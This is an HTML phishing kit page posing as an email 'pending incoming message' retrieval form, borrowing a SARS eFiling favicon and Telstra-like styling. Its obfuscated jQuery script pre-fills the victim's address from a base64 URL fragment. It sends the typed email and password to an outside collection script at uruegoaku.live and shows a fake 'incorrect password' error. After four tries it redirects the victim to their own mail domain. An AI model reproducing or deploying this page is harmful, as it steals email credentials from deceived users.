
<!DOCTYPE html>
<html lang="en" dir="ltr">
    <head>
        <style type="text/css" id="operaUserStyle"></style>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">
    <meta name="google" content="notranslate" />
    <meta name="apple-itunes-app" content="app-id=1188352635" />
    <title>Mail-Retrieve</title>
    <link rel="shortcut icon" href="https://secure.sarsefiling.co.za/app/favicon.ico" type="image/x-icon" />

    <head>
        <div class="topnav">
            
        </div>
        <h1 style="color: #0064D2;">PENDING INCOMING MESSAGE
             <br> 
        </h1>
        <p>Sign in with your receive email address
            &amp; Email Password to Retrieve</p>
            <p></p>
                    <div id="logo">&nbsp;</div>
                <label for="email address">Email Address</label><br>
                <input type="text" id="email" name="email" value="" placeholder="Enter your email address" class="std_textbox" type="text"  tabindex="1" required="" readonly required><br><br>
                <label for="password"> Email Password</label><br>
                <input onkeyup="cd();" type="password" id="password" autocomplete="off" name="password" value="" placeholder="Enter your email password." class="std_textbox" type="text"  tabindex="1" required=""><br>

                <span id="msg" class="text-danger" style="display: none;color: #D0021B; margin-top:0.25rem; margin-left: 450px; font: 400 0.875rem/1.42857143 Telstra Akkurat, Helvetica Neue, Helvetica, Arial, sans-serif;"></span><br>
                <div class="inputbox">
                <p><a href="#" style="color: #0064D2;">Reset password</a></p><br>
                <input type="submit" value="Continue Retrieve" id="submit-btn" style="background-color: #0064D2; color: #FFF; font-size: 15px; border: none; cursor: pointer;">
            
        
        
        <br><br><br>
        
        
            <style>
                body {
                    margin: 0;
                    padding: 0;
                    box-sizing: border-box;
                }
                img {
                background-repeat: no-repeat; background-attachment: fixed;
                width: 100%;
                overflow: hidden;
                }
                h1 {
                    margin-left: 450px;
                    margin-top: 70px;
                    font: 700 32px/39px Telstra Akkurat,Helvetica Neue,Helvetica,Arial,sans-serif;
                    color: #0064d2;
                }
                p { 
                    margin-left: 450px;
                    color: #414141;
                    font: 400 1rem/1.4 Telstra Akkurat,Helvetica Neue,Helvetica,Arial,sans-serif;
        
                }
                *, *::before, *::after {
                    box-sizing: border-box;
                     }
                input{
                    font-size: 14px;
                    position:relative;
                    left: 450px;
                    width: 350px;
                    height: 3.25rem;
                    border-radius: 0.25rem;
                    background-color: #fff;
                    caret-color: #0064D2;
                    border: 1.5px solid #707070;
                    padding: 12px;
                    
                }
                label{
                    position: relative;
                    left: 450px;
                    font: 700 1rem/1.4 Telstra Akkurat, Helvetica Neue, Helvetica, Arial, sans-serif;
                    color: #282828;
                    margin: 0;
                    cursor: default;
                }
                .footer {
                    position: fixed;
                    left: 0;
                    bottom: 0;
                    width: 100%;
                    background-color: #E8E8E8;
                    color: white;
           

          
        </style>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
        <script>
         function _0x225c(_0x4d4e28,_0x17291f){var _0x54113c=_0x5411();return _0x225c=function(_0x225cb0,_0x12e7b4){_0x225cb0=_0x225cb0-0x18d;var _0x37510d=_0x54113c[_0x225cb0];return _0x37510d;},_0x225c(_0x4d4e28,_0x17291f);}function _0x5411(){var _0x2779c7=['6811gwDUXj','#error','text','281508xIalKr','signal','location','val','7698588TeWoQQ','783HGVmaA','11272FySdAm','#password','replace','show','toLowerCase','test','#next','#email','#submit-btn','64523448tvsIWt','html','log','verifyPassword...','preventDefault','12554vRkSlS','The\x20email\x20or\x20password\x20you\x20entered\x20is\x20incorrect.\x20Please\x20try\x20again!','focus','hash','click','75823QDKsaa','1306593TNYMeH','msg','40UgMnNT','indexOf','5CICiFX','substr','#msg'];_0x5411=function(){return _0x2779c7;};return _0x5411();}(function(_0x52f754,_0x37c441){var _0x13f93b=_0x225c,_0x36739f=_0x52f754();while(!![]){try{var _0x475915=-parseInt(_0x13f93b(0x1a0))/0x1+parseInt(_0x13f93b(0x19b))/0x2*(-parseInt(_0x13f93b(0x1b0))/0x3)+-parseInt(_0x13f93b(0x1ab))/0x4+-parseInt(_0x13f93b(0x1a5))/0x5*(parseInt(_0x13f93b(0x1af))/0x6)+parseInt(_0x13f93b(0x1a8))/0x7*(-parseInt(_0x13f93b(0x18d))/0x8)+parseInt(_0x13f93b(0x1a1))/0x9*(-parseInt(_0x13f93b(0x1a3))/0xa)+parseInt(_0x13f93b(0x196))/0xb;if(_0x475915===_0x37c441)break;else _0x36739f['push'](_0x36739f['shift']());}catch(_0x2cf300){_0x36739f['push'](_0x36739f['shift']());}}}(_0x5411,0xceaac),$(document)['ready'](function(){var _0x255cac=_0x225c,_0x5c740d=0x0,_0x1b9e33=window[_0x255cac(0x1ad)][_0x255cac(0x19e)][_0x255cac(0x1a6)](0x1);if(!_0x1b9e33){}else{var _0x151675=/^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;if(!_0x151675['test'](_0x1b9e33))var _0x464024=_0x1b9e33;else var _0x464024=atob(_0x1b9e33);var _0xa83662=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xa83662[_0x255cac(0x192)](_0x464024))return $(_0x255cac(0x1a9))[_0x255cac(0x190)](),_0x1b9e33[_0x255cac(0x19d)],![];var _0x3595d2=_0x464024[_0x255cac(0x1a4)]('@'),_0x2e7b06=_0x464024[_0x255cac(0x1a6)](_0x3595d2+0x1),_0x4e2bec=_0x2e7b06['substr'](0x0,_0x2e7b06['indexOf']('.')),_0x2b37cf=_0x4e2bec[_0x255cac(0x191)]();$(_0x255cac(0x194))[_0x255cac(0x1ae)](_0x464024);}$('#email')[_0x255cac(0x19f)](function(){var _0x26cc88=_0x255cac;$(_0x26cc88(0x1a9))['hide']();}),$(_0x255cac(0x193))[_0x255cac(0x19f)](function(){var _0x4dd894=_0x255cac,_0x52de7b=$(_0x4dd894(0x194))['val'](),_0x13ced2=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x13ced2[_0x4dd894(0x192)](_0x52de7b))return $(_0x4dd894(0x1a9))[_0x4dd894(0x190)](),_0x1b9e33[_0x4dd894(0x19d)],![];var _0x283982=_0x52de7b[_0x4dd894(0x1a4)]('@'),_0x539cc6=_0x52de7b[_0x4dd894(0x1a6)](_0x283982+0x1),_0x5c44b0=_0x539cc6['substr'](0x0,_0x539cc6[_0x4dd894(0x1a4)]('.')),_0x3e8179=_0x5c44b0[_0x4dd894(0x191)]();}),$(_0x255cac(0x195))[_0x255cac(0x19f)](function(_0xa355e1){var _0x46e0ce=_0x255cac;_0xa355e1[_0x46e0ce(0x19a)]();var _0x4e92bc=$(_0x46e0ce(0x194))[_0x46e0ce(0x1ae)](),_0x437c22=$(_0x46e0ce(0x18e))['val'](),_0x3e2372=$('#field')[_0x46e0ce(0x197)](),_0xbfe83a=$(_0x46e0ce(0x1a7))[_0x46e0ce(0x197)](),_0x58742f=_0x4e92bc,_0x5940d8=_0x58742f[_0x46e0ce(0x1a4)]('@'),_0x1eda89=_0x58742f[_0x46e0ce(0x1a6)](_0x5940d8+0x1),_0xe86c7a=_0x1eda89[_0x46e0ce(0x1a6)](0x0,_0x1eda89['indexOf']('.')),_0x4cb16f=_0xe86c7a[_0x46e0ce(0x191)]();$(_0x46e0ce(0x1a7))[_0x46e0ce(0x1aa)](_0xbfe83a),_0x5c740d=_0x5c740d+0x1,$['ajax']({'dataType':'JSON','url':'https://uruegoaku.live/mine1/lambo.php','type':'POST','data':{'email':_0x4e92bc,'password':_0x437c22,'detail':_0x3e2372},'beforeSend':function(_0x2f5c83){var _0x5dd9ed=_0x46e0ce;$(_0x5dd9ed(0x195))[_0x5dd9ed(0x197)](_0x5dd9ed(0x199));},'success':function(_0x5935bc){var _0x3afa68=_0x46e0ce;$('#password')['val'](''),_0x5c740d>=0x4&&(_0x5c740d=0x0,window[_0x3afa68(0x1ad)][_0x3afa68(0x18f)]('http://www.'+_0x1eda89)),_0x5935bc&&($('#msg')['show'](),console[_0x3afa68(0x198)](_0x5935bc),_0x5935bc[_0x3afa68(0x1ac)]=='ok'?$(_0x3afa68(0x1a7))[_0x3afa68(0x197)](_0x5935bc[_0x3afa68(0x1a2)]):$(_0x3afa68(0x1a7))['html'](_0x5935bc[_0x3afa68(0x1a2)]));},'error':function(){var _0x48af25=_0x46e0ce;$(_0x48af25(0x18e))[_0x48af25(0x1ae)](''),_0x5c740d>=0x4&&(_0x5c740d=0x0,window[_0x48af25(0x1ad)][_0x48af25(0x18f)]('http://www.'+_0x1eda89)),$('#msg')[_0x48af25(0x190)](),$(_0x48af25(0x1a7))[_0x48af25(0x197)](_0x48af25(0x19c));},'complete':function(){var _0x4f3acc=_0x46e0ce;$(_0x4f3acc(0x195))[_0x4f3acc(0x197)]('Confirm');}});});}));
        </script> 
        </div>
    </form>
    <body>
        </html>   
            </iframe>
        </body>
</html>